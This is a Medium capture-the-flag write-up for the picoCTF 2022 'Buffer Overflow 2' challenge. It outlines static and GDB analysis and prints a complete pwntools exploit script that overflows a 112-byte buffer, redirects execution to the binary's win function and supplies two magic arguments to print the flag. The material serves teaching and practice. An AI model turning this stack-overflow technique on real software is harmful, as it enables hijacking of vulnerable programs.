Buffer Overflow 2 : picoCTF 2022

introduction

  1. static code analysis (going through the source code manually)
  2. dynamic analysis (using GDB with gef extension and examining memory address while the program is in a running state)
  1. main function
  2. vuln function
  3. win function
  1. It opens the flag and reads it
  2. Then checks the two arguments if it’s what has been declared in the binary then the program prints the flag
pattern offset 0x62616164
info functions
disassemble win
#!/usr/bin/env python3from pwn import *
import sys
if len(sys.argv) != 2:
print("[~] Usage: python3 exploit.py <HOST>")
sys.exit(1)
host = sys.argv[1]
port = 56164
context(terminal = ['tmux', 'new-window'])
#make sure you put the correct binary name and path below
binary = context.binary = ELF("./vuln")
#connect = gdb.debug("./vuln", "b main")
context(os = "linux", arch = "i386")
connect = remote(host, port)
log.info("[+] Starting buffer Overflow")
connect.recvuntil(b"Please enter your string:")
log.info("[+] Crafting payload")
payload = b"A" * 112
payload += p32(0x08049296)
payload += b"A" * 4
payload += p32(0xCAFEF00D)
payload += p32(0xF00DF00D)
log.info("[+] Sending Payload to the remote server")
connect.sendline(payload)
connect.recv()
connect.interactive()

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store